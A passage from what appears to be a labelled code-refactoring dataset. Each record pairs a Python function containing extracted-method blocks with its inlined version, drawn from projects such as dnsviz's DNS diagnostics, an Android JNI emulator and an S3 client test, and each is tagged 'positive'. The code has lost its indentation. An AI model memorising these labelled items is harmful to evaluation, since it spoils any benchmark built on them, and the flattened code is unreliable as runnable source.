action_err_kwargs['edns_new'] = retry.action_arg
action_arg = response.query.edns
if cause_err_class is not None and action_err_class is not None:
if self is not None and self.zone.server_responsive_for_action(server, client, response.responsive_cause_index_tcp, retry.action, action_arg, require_valid):
query_specific = True
else:
query_specific = False
cause_err = cause_err_class(**cause_err_kwargs)
change_err = action_err_class(response_error=cause_err, query_specific=query_specific, **action_err_kwargs)
if change_err is not None:
if dnssec_downgrade_class is not None and self is not None and self.zone.signed:
Errors.DomainNameAnalysisError.insert_into_list(change_err, self.response_errors[query], server, client, response)
Errors.DomainNameAnalysisError.insert_into_list(dnssec_downgrade_class(response_error=cause_err), self.response_errors[query], server, client, response)
else:
Errors.DomainNameAnalysisError.insert_into_list(change_err, self.response_warnings[query], server, client, response)
</DeepExtract>
<DeepExtract>
query = response.query
if self is not None:
if response.is_complete_response():
group = self.response_errors[query]
else:
group = self.response_warnings[query]
if self.analysis_type == ANALYSIS_TYPE_AUTHORITATIVE:
if not response.is_authoritative():
ds_referral = False
mygrp = group
if query.rdtype == dns.rdatatype.DS:
if not self.zone.signed:
mygrp = self.response_warnings[query]
if response.is_referral(query.qname, query.rdtype, query.rdclass, self.name):
ds_referral = True
if ds_referral:
Errors.DomainNameAnalysisError.insert_into_list(Errors.ReferralForDSQuery(parent=fmt.humanize_name(self.name)), mygrp, server, client, response)
else:
Errors.DomainNameAnalysisError.insert_into_list(Errors.NotAuthoritative(), mygrp, server, client, response)
elif self.analysis_type == ANALYSIS_TYPE_RECURSIVE:
if response.recursion_desired() and (not response.recursion_available()):
Errors.DomainNameAnalysisError.insert_into_list(Errors.RecursionNotAvailable(), group, server, client, response)
if response.is_complete_response() and response.message.rcode() == dns.rcode.NOERROR and (self.nxdomain_ancestor is not None):
Errors.DomainNameAnalysisError.insert_into_list(Errors.InconsistentNXDOMAINAncestry(qname=fmt.humanize_name(response.query.qname), ancestor_qname=fmt.humanize_name(self.nxdomain_ancestor.name)), self.response_errors[query], server, client, response)
</DeepExtract>
<DeepExtract>
if response.message is None:
return
edns_errs = []
if response.effective_edns >= 0:
if response.message.edns < 0:
if [x for x in response.message.answer if x.rdtype == dns.rdatatype.RRSIG]:
edns_errs.append(Errors.EDNSSupportNoOpt())
else:
edns_errs.append(Errors.EDNSIgnored())
else:
if response.message.rcode() == dns.rcode.BADVERS:
if response.message.edns >= response.effective_edns:
edns_errs.append(Errors.ImplementedEDNSVersionNotProvided(request_version=response.effective_edns, response_version=response.message.edns))
elif response.message.edns != response.effective_edns:
edns_errs.append(Errors.EDNSVersionMismatch(request_version=response.effective_edns, response_version=response.message.edns))
undefined_edns_flags_set = response.message.ednsflags & 65535 & ~EDNS_DEFINED_FLAGS
if undefined_edns_flags_set:
edns_errs.append(Errors.EDNSUndefinedFlagsSet(flags=undefined_edns_flags_set))
elif response.message.edns >= 0:
edns_errs.append(Errors.GratuitousOPT())
for edns_err in edns_errs:
Errors.DomainNameAnalysisError.insert_into_list(edns_err, self.response_warnings[query], server, client, response)
</DeepExtract>
<DeepExtract>
if response.message is None:
return
cookie_errs = []
try:
cookie_opt = [o for o in response.effective_edns_options if o.otype == 10][0]
except IndexError:
cookie_opt = None
try:
cookie_opt_from_server = [o for o in response.message.options if o.otype == 10][0]
except IndexError:
cookie_opt_from_server = None
supports_cookies = self is not None and server in self.cookie_jar
if response.query.edns < 0 or cookie_opt is None:
if cookie_opt_from_server is not None:
cookie_errs.append(Errors.GratuitousCookie())
elif supports_cookies:
if response.server_cookie_status == Q.DNS_COOKIE_IMPROPER_LENGTH:
issued_formerr = False
if response.effective_server_cookie_status == Q.DNS_COOKIE_IMPROPER_LENGTH:
if response.message.rcode() == dns.rcode.FORMERR:
issued_formerr = True
elif response.responsive_cause_index is not None:
retry = response.history[response.responsive_cause_index]
if retry.cause == Q.RETRY_CAUSE_RCODE and retry.cause_arg == dns.rcode.FORMERR and (retry.action == Q.RETRY_ACTION_DISABLE_EDNS or (retry.action == Q.RETRY_ACTION_REMOVE_EDNS_OPTION and retry.action_arg == 10)):
issued_formerr = True
if not issued_formerr:
cookie_errs.append(Errors.MalformedCookieWithoutFORMERR())
if response.server_cookie_status in (Q.DNS_COOKIE_CLIENT_COOKIE_ONLY, Q.DNS_COOKIE_SERVER_COOKIE_BAD):
if response.server_cookie_status == Q.DNS_COOKIE_CLIENT_COOKIE_ONLY:
err_cls = Errors.NoServerCookieWithoutBADCOOKIE
else:
err_cls = Errors.InvalidServerCookieWithoutBADCOOKIE
issued_badcookie = False
if response.effective_server_cookie_status in (Q.DNS_COOKIE_CLIENT_COOKIE_ONLY, Q.DNS_COOKIE_SERVER_COOKIE_BAD):
if cookie_opt_from_server is None:
cookie_errs.append(Errors.NoCookieOption())
elif len(cookie_opt_from_server.data) == 8:
cookie_errs.append(Errors.NoServerCookie())
if response.message.rcode() == 23:
issued_badcookie = True
elif response.responsive_cause_index is not None:
retry = response.history[response.responsive_cause_index]
if retry.cause == Q.RETRY_CAUSE_RCODE and retry.cause_arg == 23 and (retry.action == Q.RETRY_ACTION_UPDATE_DNS_COOKIE):
issued_badcookie = True
if self._strict_cookies and (not issued_badcookie):
cookie_errs.append(err_cls())
if response.effective_server_cookie_status == Q.DNS_COOKIE_SERVER_COOKIE_FRESH:
if cookie_opt_from_server is None:
cookie_errs.append(Errors.NoCookieOption())
elif len(cookie_opt_from_server.data) == 8:
cookie_errs.append(Errors.NoServerCookie())
if cookie_opt is not None and cookie_opt_from_server is not None:
if len(cookie_opt_from_server.data) >= 8 and cookie_opt_from_server.data[:8] != cookie_opt.data[:8]:
cookie_errs.append(Errors.ClientCookieMismatch())
if len(cookie_opt_from_server.data) < 8 or len(cookie_opt_from_server.data) > 40:
cookie_errs.append(Errors.CookieInvalidLength(length=len(cookie_opt_from_server.data)))
for cookie_err in cookie_errs:
Errors.DomainNameAnalysisError.insert_into_list(cookie_err, self.response_warnings[query], server, client, response)
</DeepExtract>
<DeepExtract>
query = response.query
cls = query.rdclass
if response.message is None:
return
ans_cls = [r.rdclass for r in response.message.answer if r.rdclass != cls]
auth_cls = [r.rdclass for r in response.message.authority if r.rdclass != cls]
add_cls = [r.rdclass for r in response.message.additional if r.rdclass != cls and r.rdtype != dns.rdatatype.SIG]
if ans_cls:
Errors.DomainNameAnalysisError.insert_into_list(Errors.ForeignClassDataAnswer(cls=dns.rdataclass.to_text(ans_cls[0])), self.response_warnings[query], server, client, response)
if auth_cls:
Errors.DomainNameAnalysisError.insert_into_list(Errors.ForeignClassDataAuthority(cls=dns.rdataclass.to_text(auth_cls[0])), self.response_warnings[query], server, client, response)
if add_cls:
Errors.DomainNameAnalysisError.insert_into_list(Errors.ForeignClassDataAdditional(cls=dns.rdataclass.to_text(add_cls[0])), self.response_warnings[query], server, client, response)
</DeepExtract>
<DeepExtract>
query = response.query
msg = response.message
if msg.question and query.qname.to_text() != msg.question[0].name.to_text():
Errors.DomainNameAnalysisError.insert_into_list(Errors.CasePreservationError(qname=fmt.humanize_name(query.qname, canonicalize=False)), self.response_warnings[query], server, client, response)
</DeepExtract>
|
def _populate_invalid_response_status(self, query):
self.response_errors[query] = []
for error_info in query.error_info:
for (server, client) in error_info.servers_clients:
for response in error_info.servers_clients[server, client]:
if error_info.code == Q.RESPONSE_ERROR_NETWORK_ERROR:
Errors.DomainNameAnalysisError.insert_into_list(Errors.NetworkError(tcp=response.effective_tcp, errno=errno.errorcode.get(error_info.arg, 'UNKNOWN')), self.response_errors[query], server, client, response)
if error_info.code == Q.RESPONSE_ERROR_FORMERR:
Errors.DomainNameAnalysisError.insert_into_list(Errors.FormError(tcp=response.effective_tcp, msg_size=response.msg_size), self.response_errors[query], server, client, response)
elif error_info.code == Q.RESPONSE_ERROR_TIMEOUT:
attempts = 1
for i in range(len(response.history) - 1, -1, -1):
if response.history[i].action in (Q.RETRY_ACTION_USE_TCP, Q.RETRY_ACTION_USE_UDP):
break
attempts += 1
Errors.DomainNameAnalysisError.insert_into_list(Errors.Timeout(tcp=response.effective_tcp, attempts=attempts), self.response_errors[query], server, client, response)
elif error_info.code == Q.RESPONSE_ERROR_INVALID_RCODE:
if response.effective_edns >= 0 and response.message.edns < 0 and (response.message.rcode() in (dns.rcode.FORMERR, dns.rcode.SERVFAIL, dns.rcode.NOTIMP)):
pass
elif response.effective_edns >= 0 and response.message.edns >= 0 and (response.message.rcode() == dns.rcode.BADVERS):
pass
else:
Errors.DomainNameAnalysisError.insert_into_list(Errors.InvalidRcode(tcp=response.effective_tcp, rcode=dns.rcode.to_text(response.message.rcode())), self.response_errors[query], server, client, response)
elif error_info.code == Q.RESPONSE_ERROR_OTHER:
Errors.DomainNameAnalysisError.insert_into_list(Errors.UnknownResponseError(tcp=response.effective_tcp), self.response_errors[query], server, client, response)
self.response_warnings[query] = []
for referral_info in query.referral_info:
for (server, client) in referral_info.servers_clients:
for response in referral_info.servers_clients[server, client]:
if response.is_authoritative():
Errors.DomainNameAnalysisError.insert_into_list(Errors.AuthoritativeReferral(), self.response_warnings[query], server, client, response)
for truncated_info in query.truncated_info:
for (server, client) in truncated_info.servers_clients:
for response in truncated_info.servers_clients[server, client]:
change_err = None
if response.responsive_cause_index is not None:
retry = response.history[response.responsive_cause_index]
cause_err_class = None
action_err_class = None
cause_err_kwargs = {'tcp': response.responsive_cause_index_tcp}
action_err_kwargs = {}
require_valid = False
dnssec_downgrade_class = None
if retry.cause == Q.RETRY_CAUSE_NETWORK_ERROR:
cause_err_class = Errors.NetworkError
cause_err_kwargs['errno'] = errno.errorcode.get(retry.cause_arg, 'UNKNOWN')
require_valid = False
elif retry.cause == Q.RETRY_CAUSE_FORMERR:
cause_err_class = Errors.FormError
cause_err_kwargs['msg_size'] = response.msg_size
require_valid = True
elif retry.cause == Q.RETRY_CAUSE_TIMEOUT:
cause_err_class = Errors.Timeout
cause_err_kwargs['attempts'] = response.responsive_cause_index + 1
require_valid = False
elif retry.cause == Q.RETRY_CAUSE_RCODE:
if retry.cause_arg in (dns.rcode.FORMERR, dns.rcode.SERVFAIL, dns.rcode.NOTIMP) and self is not None and self.zone.signed:
dnssec_downgrade_class = Errors.DNSSECDowngradeEDNSDisabled
if retry.cause_arg in (dns.rcode.FORMERR, dns.rcode.SERVFAIL, dns.rcode.NOTIMP) and retry.action == Q.RETRY_ACTION_DISABLE_EDNS and (not (self is not None and self.zone.signed)):
pass
elif retry.cause_arg == dns.rcode.BADVERS and retry.action == Q.RETRY_ACTION_CHANGE_EDNS_VERSION:
pass
elif retry.cause_arg == dns.rcode.SERVFAIL and retry.action == Q.RETRY_ACTION_SET_FLAG and (retry.action_arg == dns.flags.CD):
pass
elif retry.cause_arg == 23 and response.server_cookie_status in (Q.DNS_COOKIE_CLIENT_COOKIE_ONLY, Q.DNS_COOKIE_SERVER_COOKIE_BAD) and (retry.action == Q.RETRY_ACTION_UPDATE_DNS_COOKIE):
pass
if retry.cause_arg == dns.rcode.FORMERR and response.server_cookie_status == Q.DNS_COOKIE_IMPROPER_LENGTH and (retry.action == Q.RETRY_ACTION_DISABLE_EDNS or (retry.action == Q.RETRY_ACTION_REMOVE_EDNS_OPTION and retry.action_arg == 10)):
pass
else:
cause_err_class = Errors.InvalidRcode
cause_err_kwargs['rcode'] = dns.rcode.to_text(retry.cause_arg)
require_valid = True
elif retry.cause == Q.RETRY_CAUSE_OTHER:
require_valid = True
action_arg = retry.action_arg
if retry.action == Q.RETRY_ACTION_NO_CHANGE:
pass
elif retry.action == Q.RETRY_ACTION_CHANGE_SPORT:
pass
elif retry.action == Q.RETRY_ACTION_SET_FLAG:
action_err_class = Errors.ResponseErrorWithoutRequestFlag
action_err_kwargs['flag'] = dns.flags.to_text(retry.action_arg)
if not action_err_kwargs['flag']:
action_err_kwargs['flag'] = retry.action_arg
elif retry.action == Q.RETRY_ACTION_CLEAR_FLAG:
action_err_class = Errors.ResponseErrorWithRequestFlag
action_err_kwargs['flag'] = dns.flags.to_text(retry.action_arg)
if not action_err_kwargs['flag']:
action_err_kwargs['flag'] = retry.action_arg
elif retry.action == Q.RETRY_ACTION_DISABLE_EDNS:
action_err_class = Errors.ResponseErrorWithEDNS
dnssec_downgrade_class = Errors.DNSSECDowngradeEDNSDisabled
elif retry.action == Q.RETRY_ACTION_CHANGE_UDP_MAX_PAYLOAD:
action_err_class = Errors.PMTUExceeded
action_err_kwargs['pmtu_lower_bound'] = None
action_err_kwargs['pmtu_upper_bound'] = None
elif retry.action == Q.RETRY_ACTION_SET_EDNS_FLAG:
action_err_class = Errors.ResponseErrorWithoutEDNSFlag
action_err_kwargs['flag'] = dns.flags.edns_to_text(retry.action_arg)
if not action_err_kwargs['flag']:
action_err_kwargs['flag'] = retry.action_arg
elif retry.action == Q.RETRY_ACTION_CLEAR_EDNS_FLAG:
action_err_class = Errors.ResponseErrorWithEDNSFlag
action_err_kwargs['flag'] = dns.flags.edns_to_text(retry.action_arg)
if not action_err_kwargs['flag']:
action_err_kwargs['flag'] = retry.action_arg
if retry.action_arg == dns.flags.DO:
dnssec_downgrade_class = Errors.DNSSECDowngradeDOBitCleared
elif retry.action == Q.RETRY_ACTION_ADD_EDNS_OPTION:
action_err_class = Errors.ResponseErrorWithoutEDNSOption
action_err_kwargs['option'] = fmt.EDNS_OPT_DESCRIPTIONS.get(retry.action_arg, retry.action_arg)
elif retry.action == Q.RETRY_ACTION_REMOVE_EDNS_OPTION:
action_err_class = Errors.ResponseErrorWithEDNSOption
action_err_kwargs['option'] = fmt.EDNS_OPT_DESCRIPTIONS.get(retry.action_arg, retry.action_arg)
elif retry.action == Q.RETRY_ACTION_CHANGE_EDNS_VERSION:
action_err_class = Errors.ResponseErrorWithEDNSVersion
action_err_kwargs['edns_old'] = response.query.edns
action_err_kwargs['edns_new'] = retry.action_arg
action_arg = response.query.edns
if cause_err_class is not None and action_err_class is not None:
if self is not None and self.zone.server_responsive_for_action(server, client, response.responsive_cause_index_tcp, retry.action, action_arg, require_valid):
query_specific = True
else:
query_specific = False
cause_err = cause_err_class(**cause_err_kwargs)
change_err = action_err_class(response_error=cause_err, query_specific=query_specific, **action_err_kwargs)
if change_err is not None:
if dnssec_downgrade_class is not None and self is not None and self.zone.signed:
Errors.DomainNameAnalysisError.insert_into_list(change_err, self.response_errors[query], server, client, response)
Errors.DomainNameAnalysisError.insert_into_list(dnssec_downgrade_class(response_error=cause_err), self.response_errors[query], server, client, response)
else:
Errors.DomainNameAnalysisError.insert_into_list(change_err, self.response_warnings[query], server, client, response)
query = response.query
if self is not None:
if response.is_complete_response():
group = self.response_errors[query]
else:
group = self.response_warnings[query]
if self.analysis_type == ANALYSIS_TYPE_AUTHORITATIVE:
if not response.is_authoritative():
ds_referral = False
mygrp = group
if query.rdtype == dns.rdatatype.DS:
if not self.zone.signed:
mygrp = self.response_warnings[query]
if response.is_referral(query.qname, query.rdtype, query.rdclass, self.name):
ds_referral = True
if ds_referral:
Errors.DomainNameAnalysisError.insert_into_list(Errors.ReferralForDSQuery(parent=fmt.humanize_name(self.name)), mygrp, server, client, response)
else:
Errors.DomainNameAnalysisError.insert_into_list(Errors.NotAuthoritative(), mygrp, server, client, response)
elif self.analysis_type == ANALYSIS_TYPE_RECURSIVE:
if response.recursion_desired() and (not response.recursion_available()):
Errors.DomainNameAnalysisError.insert_into_list(Errors.RecursionNotAvailable(), group, server, client, response)
if response.is_complete_response() and response.message.rcode() == dns.rcode.NOERROR and (self.nxdomain_ancestor is not None):
Errors.DomainNameAnalysisError.insert_into_list(Errors.InconsistentNXDOMAINAncestry(qname=fmt.humanize_name(response.query.qname), ancestor_qname=fmt.humanize_name(self.nxdomain_ancestor.name)), self.response_errors[query], server, client, response)
if response.message is None:
return
edns_errs = []
if response.effective_edns >= 0:
if response.message.edns < 0:
if [x for x in response.message.answer if x.rdtype == dns.rdatatype.RRSIG]:
edns_errs.append(Errors.EDNSSupportNoOpt())
else:
edns_errs.append(Errors.EDNSIgnored())
else:
if response.message.rcode() == dns.rcode.BADVERS:
if response.message.edns >= response.effective_edns:
edns_errs.append(Errors.ImplementedEDNSVersionNotProvided(request_version=response.effective_edns, response_version=response.message.edns))
elif response.message.edns != response.effective_edns:
edns_errs.append(Errors.EDNSVersionMismatch(request_version=response.effective_edns, response_version=response.message.edns))
undefined_edns_flags_set = response.message.ednsflags & 65535 & ~EDNS_DEFINED_FLAGS
if undefined_edns_flags_set:
edns_errs.append(Errors.EDNSUndefinedFlagsSet(flags=undefined_edns_flags_set))
elif response.message.edns >= 0:
edns_errs.append(Errors.GratuitousOPT())
for edns_err in edns_errs:
Errors.DomainNameAnalysisError.insert_into_list(edns_err, self.response_warnings[query], server, client, response)
if response.message is None:
return
cookie_errs = []
try:
cookie_opt = [o for o in response.effective_edns_options if o.otype == 10][0]
except IndexError:
cookie_opt = None
try:
cookie_opt_from_server = [o for o in response.message.options if o.otype == 10][0]
except IndexError:
cookie_opt_from_server = None
supports_cookies = self is not None and server in self.cookie_jar
if response.query.edns < 0 or cookie_opt is None:
if cookie_opt_from_server is not None:
cookie_errs.append(Errors.GratuitousCookie())
elif supports_cookies:
if response.server_cookie_status == Q.DNS_COOKIE_IMPROPER_LENGTH:
issued_formerr = False
if response.effective_server_cookie_status == Q.DNS_COOKIE_IMPROPER_LENGTH:
if response.message.rcode() == dns.rcode.FORMERR:
issued_formerr = True
elif response.responsive_cause_index is not None:
retry = response.history[response.responsive_cause_index]
if retry.cause == Q.RETRY_CAUSE_RCODE and retry.cause_arg == dns.rcode.FORMERR and (retry.action == Q.RETRY_ACTION_DISABLE_EDNS or (retry.action == Q.RETRY_ACTION_REMOVE_EDNS_OPTION and retry.action_arg == 10)):
issued_formerr = True
if not issued_formerr:
cookie_errs.append(Errors.MalformedCookieWithoutFORMERR())
if response.server_cookie_status in (Q.DNS_COOKIE_CLIENT_COOKIE_ONLY, Q.DNS_COOKIE_SERVER_COOKIE_BAD):
if response.server_cookie_status == Q.DNS_COOKIE_CLIENT_COOKIE_ONLY:
err_cls = Errors.NoServerCookieWithoutBADCOOKIE
else:
err_cls = Errors.InvalidServerCookieWithoutBADCOOKIE
issued_badcookie = False
if response.effective_server_cookie_status in (Q.DNS_COOKIE_CLIENT_COOKIE_ONLY, Q.DNS_COOKIE_SERVER_COOKIE_BAD):
if cookie_opt_from_server is None:
cookie_errs.append(Errors.NoCookieOption())
elif len(cookie_opt_from_server.data) == 8:
cookie_errs.append(Errors.NoServerCookie())
if response.message.rcode() == 23:
issued_badcookie = True
elif response.responsive_cause_index is not None:
retry = response.history[response.responsive_cause_index]
if retry.cause == Q.RETRY_CAUSE_RCODE and retry.cause_arg == 23 and (retry.action == Q.RETRY_ACTION_UPDATE_DNS_COOKIE):
issued_badcookie = True
if self._strict_cookies and (not issued_badcookie):
cookie_errs.append(err_cls())
if response.effective_server_cookie_status == Q.DNS_COOKIE_SERVER_COOKIE_FRESH:
if cookie_opt_from_server is None:
cookie_errs.append(Errors.NoCookieOption())
elif len(cookie_opt_from_server.data) == 8:
cookie_errs.append(Errors.NoServerCookie())
if cookie_opt is not None and cookie_opt_from_server is not None:
if len(cookie_opt_from_server.data) >= 8 and cookie_opt_from_server.data[:8] != cookie_opt.data[:8]:
cookie_errs.append(Errors.ClientCookieMismatch())
if len(cookie_opt_from_server.data) < 8 or len(cookie_opt_from_server.data) > 40:
cookie_errs.append(Errors.CookieInvalidLength(length=len(cookie_opt_from_server.data)))
for cookie_err in cookie_errs:
Errors.DomainNameAnalysisError.insert_into_list(cookie_err, self.response_warnings[query], server, client, response)
query = response.query
cls = query.rdclass
if response.message is None:
return
ans_cls = [r.rdclass for r in response.message.answer if r.rdclass != cls]
auth_cls = [r.rdclass for r in response.message.authority if r.rdclass != cls]
add_cls = [r.rdclass for r in response.message.additional if r.rdclass != cls and r.rdtype != dns.rdatatype.SIG]
if ans_cls:
Errors.DomainNameAnalysisError.insert_into_list(Errors.ForeignClassDataAnswer(cls=dns.rdataclass.to_text(ans_cls[0])), self.response_warnings[query], server, client, response)
if auth_cls:
Errors.DomainNameAnalysisError.insert_into_list(Errors.ForeignClassDataAuthority(cls=dns.rdataclass.to_text(auth_cls[0])), self.response_warnings[query], server, client, response)
if add_cls:
Errors.DomainNameAnalysisError.insert_into_list(Errors.ForeignClassDataAdditional(cls=dns.rdataclass.to_text(add_cls[0])), self.response_warnings[query], server, client, response)
query = response.query
msg = response.message
if msg.question and query.qname.to_text() != msg.question[0].name.to_text():
Errors.DomainNameAnalysisError.insert_into_list(Errors.CasePreservationError(qname=fmt.humanize_name(query.qname, canonicalize=False)), self.response_warnings[query], server, client, response)
|
dnsviz
|
positive
|
@native_method
def get_static_object_field(self, uc, env, clazz_idx, field_id):
logger.debug('JNIEnv->GetStaticObjectField(%d, %d) was called' % (clazz_idx, field_id))
<DeepExtract>
if clazz_idx == 0:
clazz = None
if self._locals.in_range(clazz_idx):
clazz = self._locals.get(clazz_idx)
if self._globals.in_range(clazz_idx):
clazz = self._globals.get(clazz_idx)
raise RuntimeError('Invalid get_reference(%d)' % clazz_idx)
</DeepExtract>
field = clazz.value.find_field_by_id(field_id)
return field.static_value
|
@native_method
def get_static_object_field(self, uc, env, clazz_idx, field_id):
logger.debug('JNIEnv->GetStaticObjectField(%d, %d) was called' % (clazz_idx, field_id))
if clazz_idx == 0:
clazz = None
if self._locals.in_range(clazz_idx):
clazz = self._locals.get(clazz_idx)
if self._globals.in_range(clazz_idx):
clazz = self._globals.get(clazz_idx)
raise RuntimeError('Invalid get_reference(%d)' % clazz_idx)
field = clazz.value.find_field_by_id(field_id)
return field.static_value
|
AndroidNativeEmu
|
positive
|
def get_arguments(params, parameter_name, section_list, channel, channel_name, variable_parameters, cond_density, release_params, custom_channel_ion=None, custom_ion_erevs=None):
"""Get arguments for channel density function.
Arguments:
params (dict): contains the cell's parameters
parameter_name (str): name of the parameter (e.g. e_pas)
section_list (str): name of the location of the parameter (e.g. axonal)
channel (str): ion channel (e.g. StochKv)
channel_name (str): ion channel name used in the neuroML channel file
(e.g. StochKv_deterministic)
variable_parameters (list of neuroml.VariableParameter):
parameters for non-uniform distributions
cond_density (str): conductance density
release_params (dict): optimized parameters
custom_channel_ion (dict): dict mapping channel to ion
custom_ion_erevs (dict): dict mapping ion to erev (reversal potential)
"""
arguments = {}
<DeepExtract>
ion = channel_ions.get(channel, None)
if ion is None and custom_channel_ion is not None:
ion = custom_channel_ion.get(channel, None)
if ion is None:
raise KeyError(f'Ion not found for channel {channel}. Please set channel-ion mapping using custom_channel_ion.')
arguments['ion'] = ion
</DeepExtract>
<DeepExtract>
erev = ion_erevs.get(arguments['ion'], None)
if erev is None and custom_ion_erevs is not None:
erev = custom_ion_erevs.get(arguments['ion'], None)
if erev is None:
raise KeyError(f"Reversal potential not found for ion {arguments['ion']}. Please set ion-erev mapping using custom_ion_erevs.")
erev = erev
</DeepExtract>
channel_class = 'ChannelDensity'
if erev == 'nernst':
erev = None
channel_class = 'ChannelDensityNernst'
elif erev == 'pas':
erev = params[f'e_pas.{section_list}'].value
if erev is None:
erev = release_params[f'e_pas.{section_list}']
erev = f'{erev} mV'
arguments['ion'] = 'non_specific'
if variable_parameters is not None:
channel_class += 'NonUniform'
else:
arguments['segment_groups'] = section_list
if erev is not None:
arguments['erev'] = erev
arguments['id'] = f'{section_list}_{parameter_name}'
if cond_density is not None:
arguments['cond_density'] = cond_density
arguments['ion_channel'] = channel_name
if variable_parameters is not None:
arguments['variable_parameters'] = variable_parameters
return (arguments, channel_class)
|
def get_arguments(params, parameter_name, section_list, channel, channel_name, variable_parameters, cond_density, release_params, custom_channel_ion=None, custom_ion_erevs=None):
"""Get arguments for channel density function.
Arguments:
params (dict): contains the cell's parameters
parameter_name (str): name of the parameter (e.g. e_pas)
section_list (str): name of the location of the parameter (e.g. axonal)
channel (str): ion channel (e.g. StochKv)
channel_name (str): ion channel name used in the neuroML channel file
(e.g. StochKv_deterministic)
variable_parameters (list of neuroml.VariableParameter):
parameters for non-uniform distributions
cond_density (str): conductance density
release_params (dict): optimized parameters
custom_channel_ion (dict): dict mapping channel to ion
custom_ion_erevs (dict): dict mapping ion to erev (reversal potential)
"""
arguments = {}
ion = channel_ions.get(channel, None)
if ion is None and custom_channel_ion is not None:
ion = custom_channel_ion.get(channel, None)
if ion is None:
raise KeyError(f'Ion not found for channel {channel}. Please set channel-ion mapping using custom_channel_ion.')
arguments['ion'] = ion
erev = ion_erevs.get(arguments['ion'], None)
if erev is None and custom_ion_erevs is not None:
erev = custom_ion_erevs.get(arguments['ion'], None)
if erev is None:
raise KeyError(f"Reversal potential not found for ion {arguments['ion']}. Please set ion-erev mapping using custom_ion_erevs.")
erev = erev
channel_class = 'ChannelDensity'
if erev == 'nernst':
erev = None
channel_class = 'ChannelDensityNernst'
elif erev == 'pas':
erev = params[f'e_pas.{section_list}'].value
if erev is None:
erev = release_params[f'e_pas.{section_list}']
erev = f'{erev} mV'
arguments['ion'] = 'non_specific'
if variable_parameters is not None:
channel_class += 'NonUniform'
else:
arguments['segment_groups'] = section_list
if erev is not None:
arguments['erev'] = erev
arguments['id'] = f'{section_list}_{parameter_name}'
if cond_density is not None:
arguments['cond_density'] = cond_density
arguments['ion_channel'] = channel_name
if variable_parameters is not None:
arguments['variable_parameters'] = variable_parameters
return (arguments, channel_class)
|
BluePyOpt
|
positive
|
def _get_all(self):
"""
Returns a dict of the options that need to be updated to
remember and process the state of the form.
"""
<DeepExtract>
dropdown = self.findChild(aqt.qt.QComboBox, 'service')
idx = dropdown.currentIndex()
svc_id = dropdown.itemData(idx)
if svc_id.startswith('group:'):
(svc_id, values) = (svc_id, None)
vinputs = self.findChild(aqt.qt.QStackedWidget, 'panels').widget(idx).findChildren(self._OPTIONS_WIDGETS)
options = self._addon.router.get_options(svc_id)
assert len(options) == len(vinputs)
(svc_id, values) = (svc_id, {options[i]['key']: vinputs[i].value() if isinstance(vinputs[i], aqt.qt.QDoubleSpinBox) or isinstance(vinputs[i], aqt.qt.QSpinBox) else vinputs[i].itemData(vinputs[i].currentIndex()) for i in range(len(options))})
</DeepExtract>
return {'last_service': svc_id, 'last_options': {**self._addon.config['last_options'], **{svc_id: values}}} if values else dict(last_service=svc_id)
|
def _get_all(self):
"""
Returns a dict of the options that need to be updated to
remember and process the state of the form.
"""
dropdown = self.findChild(aqt.qt.QComboBox, 'service')
idx = dropdown.currentIndex()
svc_id = dropdown.itemData(idx)
if svc_id.startswith('group:'):
(svc_id, values) = (svc_id, None)
vinputs = self.findChild(aqt.qt.QStackedWidget, 'panels').widget(idx).findChildren(self._OPTIONS_WIDGETS)
options = self._addon.router.get_options(svc_id)
assert len(options) == len(vinputs)
(svc_id, values) = (svc_id, {options[i]['key']: vinputs[i].value() if isinstance(vinputs[i], aqt.qt.QDoubleSpinBox) or isinstance(vinputs[i], aqt.qt.QSpinBox) else vinputs[i].itemData(vinputs[i].currentIndex()) for i in range(len(options))})
return {'last_service': svc_id, 'last_options': {**self._addon.config['last_options'], **{svc_id: values}}} if values else dict(last_service=svc_id)
|
awesometts-anki-addon
|
positive
|
def _test_s3_put_get_object(self, request, request_type, exception_name=None):
<DeepExtract>
event_loop_group = EventLoopGroup()
host_resolver = DefaultHostResolver(event_loop_group)
bootstrap = ClientBootstrap(event_loop_group, host_resolver)
credential_provider = AwsCredentialsProvider.new_default_chain(bootstrap)
tls_option = None
if False:
opt = TlsContextOptions()
ctx = ClientTlsContext(opt)
tls_option = TlsConnectionOptions(ctx)
s3_client = S3Client(bootstrap=bootstrap, region=self.region, credential_provider=credential_provider, tls_connection_options=tls_option, part_size=5 * MB)
s3_client = s3_client
</DeepExtract>
s3_request = s3_client.make_request(request=request, type=request_type, on_headers=self._on_request_headers, on_body=self._on_request_body)
finished_future = s3_request.finished_future
try:
finished_future.result(self.timeout)
except Exception as e:
self.assertEqual(e.name, exception_name)
else:
<DeepExtract>
self.assertEqual(self.response_status_code, 200, 'status code is not 200')
headers = HttpHeaders(self.response_headers)
self.assertIsNone(headers.get('Content-Range'))
body_length = headers.get('Content-Length')
if not request_type is S3RequestType.PUT_OBJECT:
self.assertIsNotNone(body_length, 'Content-Length is missing from headers')
if body_length:
self.assertEqual(int(body_length), self.received_body_len, 'Received body length does not match the Content-Length header')
</DeepExtract>
shutdown_event = s3_request.shutdown_event
s3_request = None
self.assertTrue(shutdown_event.wait(self.timeout))
|
def _test_s3_put_get_object(self, request, request_type, exception_name=None):
event_loop_group = EventLoopGroup()
host_resolver = DefaultHostResolver(event_loop_group)
bootstrap = ClientBootstrap(event_loop_group, host_resolver)
credential_provider = AwsCredentialsProvider.new_default_chain(bootstrap)
tls_option = None
if False:
opt = TlsContextOptions()
ctx = ClientTlsContext(opt)
tls_option = TlsConnectionOptions(ctx)
s3_client = S3Client(bootstrap=bootstrap, region=self.region, credential_provider=credential_provider, tls_connection_options=tls_option, part_size=5 * MB)
s3_client = s3_client
s3_request = s3_client.make_request(request=request, type=request_type, on_headers=self._on_request_headers, on_body=self._on_request_body)
finished_future = s3_request.finished_future
try:
finished_future.result(self.timeout)
except Exception as e:
self.assertEqual(e.name, exception_name)
else:
self.assertEqual(self.response_status_code, 200, 'status code is not 200')
headers = HttpHeaders(self.response_headers)
self.assertIsNone(headers.get('Content-Range'))
body_length = headers.get('Content-Length')
if not request_type is S3RequestType.PUT_OBJECT:
self.assertIsNotNone(body_length, 'Content-Length is missing from headers')
if body_length:
self.assertEqual(int(body_length), self.received_body_len, 'Received body length does not match the Content-Length header')
shutdown_event = s3_request.shutdown_event
s3_request = None
self.assertTrue(shutdown_event.wait(self.timeout))
|
aws-crt-python
|
positive
|
def detect(self, images):
"""Runs the detection pipeline.
images: List of images, potentially of different sizes.
Returns a list of dicts, one dict per image. The dict contains:
